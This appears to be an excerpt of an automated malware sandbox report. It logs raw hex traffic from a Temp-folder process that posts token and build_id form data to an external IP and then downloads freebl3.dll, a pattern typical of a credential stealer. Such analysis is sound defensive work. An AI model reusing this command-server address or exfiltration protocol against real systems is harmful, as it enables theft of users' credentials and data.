                                                                      2024-05-26 08:29:13 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                      Data Ascii: X~e!*FW|>|L1146
                                                                      2024-05-26 08:29:13 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                      Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                      2024-05-26 08:29:13 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                      Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                      2024-05-26 08:29:13 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                      Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                      2024-05-26 08:29:13 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                      Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                      2024-05-26 08:29:13 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                      Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                      2024-05-26 08:29:13 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                      Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                      2024-05-26 08:29:13 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                      Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                      2024-05-26 08:29:13 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                      Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      16192.168.2.44977765.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:15 UTC279OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEH
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 4677
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:15 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------CBAKFCBFHJDHJKECAKEHContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CBAKFCBFHJDHJKECAKEHCont
                                                                      2024-05-26 08:29:16 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2ok0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      17192.168.2.44977865.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:16 UTC279OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----KECBFBAEBKJJJJKFCGCB
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 1529
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:16 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 42 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------KECBFBAEBKJJJJKFCGCBContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------KECBFBAEBKJJJJKFCGCBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KECBFBAEBKJJJJKFCGCBCont
                                                                      2024-05-26 08:29:17 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:17 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2ok0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      18192.168.2.44977965.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:18 UTC278OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----IJECAEHJJJKJKFIDGCBG
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 437
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:18 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------IJECAEHJJJKJKFIDGCBGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IJECAEHJJJKJKFIDGCBGCont
                                                                      2024-05-26 08:29:19 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:19 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2ok0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      19192.168.2.44978065.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:19 UTC278OUTPOST / HTTP/1.1
                                                                      Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDG
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Content-Length: 437
                                                                      Connection: Keep-Alive
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:19 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 39 35 38 37 30 62 66 64 35 38 33 62 35 61 61 32 39 38 39 35 33 37 63 66 30 33 35 31 30 34 37 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4b 4b 4a 4a 44 41 41 41 41 41 4b 46 48 4a 4a 44 47 0d 0a 43 6f 6e 74
                                                                      Data Ascii: ------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="token"f95870bfd583b5aa2989537cf0351047------IJJKKJJDAAAAAKFHJJDGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------IJJKKJJDAAAAAKFHJJDGCont
                                                                      2024-05-26 08:29:20 UTC158INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      2024-05-26 08:29:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 2ok0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      20192.168.2.44978165.109.242.594434480C:\Users\user\AppData\Local\Temp\katB4C0.tmp
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-05-26 08:29:22 UTC173OUTGET /freebl3.dll HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                      Host: 65.109.242.59
                                                                      Cache-Control: no-cache
                                                                      2024-05-26 08:29:22 UTC246INHTTP/1.1 200 OK
                                                                      Server: nginx
                                                                      Date: Sun, 26 May 2024 08:29:22 GMT
                                                                      Content-Type: application/octet-stream
                                                                      Content-Length: 685392
                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                      Connection: close
                                                                      ETag: "6315a9f4-a7550"
                                                                      Accept-Ranges: bytes
                                                                      2024-05-26 08:29:22 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                      2024-05-26 08:29:22 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                      Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                      2024-05-26 08:29:22 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                      Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                      2024-05-26 08:29:23 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                      Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
